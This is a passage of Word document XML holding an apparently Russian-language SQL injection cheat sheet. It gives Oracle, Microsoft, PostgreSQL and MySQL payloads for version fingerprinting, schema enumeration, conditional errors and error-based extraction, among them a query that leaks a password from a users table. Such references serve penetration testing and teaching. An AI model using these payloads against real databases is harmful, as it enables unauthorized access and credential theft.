      <w:r w:rsidRPr="00194A63">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Oracle</w:t>
      </w:r>
      <w:r w:rsidRPr="00194A63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00194A63">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT banner FROM v$version</w:t>
      </w:r>
      <w:r w:rsidRPr="00194A63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:t>или</w:t>
      </w:r>
      <w:r w:rsidRPr="00194A63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00194A63">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT version FROM v$instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107AAC22" w14:textId="77777777" w:rsidR="00A90600" w:rsidRPr="00BD08D8" w:rsidRDefault="00A90600" w:rsidP="00194A63">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00194A63">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00194A63">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SELECT @@version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2A5F5B" w14:textId="77777777" w:rsidR="00A90600" w:rsidRPr="00BD08D8" w:rsidRDefault="00A90600" w:rsidP="00194A63">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00194A63">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00194A63">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SELECT version()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D98F914" w14:textId="77777777" w:rsidR="00A90600" w:rsidRPr="00BD08D8" w:rsidRDefault="00A90600" w:rsidP="00194A63">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00194A63">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00194A63">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SELECT @@version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5BAEC0" w14:textId="77777777" w:rsidR="00194A63" w:rsidRDefault="00194A63" w:rsidP="00BD08D8"/>
    <w:p w14:paraId="0F74A27D" w14:textId="79FCD2EC" w:rsidR="00A90600" w:rsidRPr="00BD08D8" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:r w:rsidRPr="00BD08D8">
        <w:t>Содержимое базы данных</w:t>
      </w:r>
      <w:r w:rsidR="00194A63">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. Отобразить </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:t>таблицы и столбцы базы данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088A4884" w14:textId="77777777" w:rsidR="00A90600" w:rsidRPr="00BD08D8" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Oracle</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AB2F49" w14:textId="77777777" w:rsidR="00A90600" w:rsidRPr="00BD08D8" w:rsidRDefault="00A90600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operator"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*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FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> all_tables; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6751630E" w14:textId="2041EEF8" w:rsidR="00A90600" w:rsidRPr="00BD08D8" w:rsidRDefault="00A90600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operator"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*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FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> all_tab_columns </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> table_name </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'TABLE-NAME-HERE'</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7965DB" w14:textId="6AFE64BB" w:rsidR="00A90600" w:rsidRPr="00BD08D8" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30039556" w14:textId="77777777" w:rsidR="00A90600" w:rsidRPr="00194A63" w:rsidRDefault="00A90600" w:rsidP="00194A63">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00194A63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM information_schema.tables; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6B3918" w14:textId="786D2A54" w:rsidR="00A90600" w:rsidRPr="00194A63" w:rsidRDefault="00A90600" w:rsidP="00194A63">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00194A63">
        <w:t>SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFDD50D" w14:textId="3AE30301" w:rsidR="00A90600" w:rsidRPr="00BD08D8" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="662796EF" w14:textId="0498DEB5" w:rsidR="00A90600" w:rsidRPr="00BD08D8" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:r w:rsidRPr="00BD08D8">
        <w:t>Условные ошибки</w:t>
      </w:r>
      <w:r w:rsidR="00194A63">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. Проверить </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:t>условие и вызвать ошибку базы данных, если оно истинно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D63ED8" w14:textId="77777777" w:rsidR="00A90600" w:rsidRPr="00BD08D8" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:p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Oracle</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F70871" w14:textId="69DEAB5F" w:rsidR="00A90600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CASE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WHEN</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (YOUR</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CONDITION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 xml:space="preserve">HERE) </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>THEN</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TO_CHAR(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ELSE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NULL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END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FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> dual;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E615293" w14:textId="738A8C11" w:rsidR="00BD08D8" w:rsidRPr="00BD08D8" w:rsidRDefault="00BD08D8" w:rsidP="00BD08D8">
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252C5D4A" w14:textId="603265C5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CASE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WHEN</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (YOUR</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CONDITION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 xml:space="preserve">HERE) </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>THEN</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0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ELSE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NULL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END</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08771C19" w14:textId="6F23138E" w:rsidR="00BD08D8" w:rsidRPr="00BD08D8" w:rsidRDefault="00BD08D8" w:rsidP="00BD08D8">
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB21C22" w14:textId="172EF6BE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number"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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CASE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WHEN</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (YOUR</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CONDITION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 xml:space="preserve">HERE) </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>THEN</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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number"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ELSE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NULL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END</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBC997B" w14:textId="68EE7578" w:rsidR="00BD08D8" w:rsidRPr="00BD08D8" w:rsidRDefault="00BD08D8" w:rsidP="00BD08D8">
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1D5D67" w14:textId="11F6C06E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IF(YOUR</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CONDITION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>HERE, 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table_name </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> information_schema.tables), </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'a'</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4240EB64" w14:textId="4F933458" w:rsidR="00BD08D8" w:rsidRPr="00BD08D8" w:rsidRDefault="00BD08D8" w:rsidP="00BD08D8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CF27234" w14:textId="7C42DB7F" w:rsidR="00BD08D8" w:rsidRPr="00BD08D8" w:rsidRDefault="00BD08D8" w:rsidP="00BD08D8">
      <w:r w:rsidRPr="00BD08D8">
        <w:lastRenderedPageBreak/>
        <w:t>Извлечение данных через видимые сообщения об ошибках</w:t>
      </w:r>
      <w:r w:rsidR="00194A63">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:t>Некоторые запросы могут вызывать сообщения об ошибках, которые утекут чувствительные данные.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C13F721" w14:textId="77777777" w:rsidR="00BD08D8" w:rsidRPr="00BD08D8" w:rsidRDefault="00BD08D8" w:rsidP="00BD08D8">
      <w:p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Microsoft</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4BE5B7" w14:textId="64381D31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string"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'foo'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WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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string"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'secret'</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C4DDEE" w14:textId="063BEF0A" w:rsidR="00BD08D8" w:rsidRPr="00BD08D8" w:rsidRDefault="00BD08D8" w:rsidP="00BD08D8">
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444E176B" w14:textId="26E80F6E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builtin"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CAST</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>((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password </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> users LIMIT </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AS</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA4B432" w14:textId="26488727" w:rsidR="00BD08D8" w:rsidRPr="00BD08D8" w:rsidRDefault="00BD08D8" w:rsidP="00BD08D8">
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4775B6F0" w14:textId="35365FD2" w:rsidR="00BD08D8" w:rsidRPr="00BD08D8" w:rsidRDefault="00BD08D8" w:rsidP="00194A63">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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string"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'foo'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WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AND</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> EXTRACTVALUE(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, CONCAT(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x5c</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, (</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'secret'</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)));</w:t>
      </w:r>
    </w:p>
